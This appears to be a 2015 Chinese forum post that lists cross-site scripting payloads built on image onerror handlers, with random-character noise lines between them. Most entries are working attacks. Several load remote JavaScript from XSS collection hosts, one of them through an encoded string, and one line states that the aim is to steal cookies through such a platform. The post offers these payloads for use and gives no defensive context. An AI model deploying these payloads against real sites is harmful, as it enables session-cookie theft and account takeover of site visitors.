<img src='non-exist.jpg'onerror="alert('xss')">
- r1 |" J: T7 [0 N& z' S) W<img src=# onerror=alert(123)>
! U0 A+ q* w$ V+ g- G2 O9 _+ r<img src=# onerror=alert(document.cookie)>
$ b2 d, P( R3 i0 q下面是利用平台钓cookie的
# @ W J% H1 e2 X/ w <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
9 V& f0 F$ v1 l4 M, k( C& W* b7 D1 z. p6 N, i
/ \; L7 t: ]; R$ U
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>' Y9 w4 Q P, [+ H3 z
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
/ W2 G$ x4 M5 r5 H“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
7 ?$ d0 v& w. w1 o; O<img src=1 onerror=jQuery.getScript("//xss.re/974")> % I/ p! [1 i( R- g
<img src="#">
4 c6 m) g6 @3 [+ h7 }8 T- U( R<img src="#">- J5 p' k5 ` b; L
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>3 r4 `( ^" r0 {8 O
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">" ]' w5 j5 Q: r
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
9 ~# V8 s u1 |<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>! y$ A6 w# C8 M! C, k: n. g0 T
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
* O' h# o' C2 P& l2 o5 @7 `6 k<img src=x width="0" height="0"></img>
% d7 M1 I9 I# b9 T5 K<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
9 L2 [/ |! t( H<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
+ ^" H0 A' P$ s5 f* l1 l) | |
发表于 2015-10-18 14:33:54
收藏
支持
反对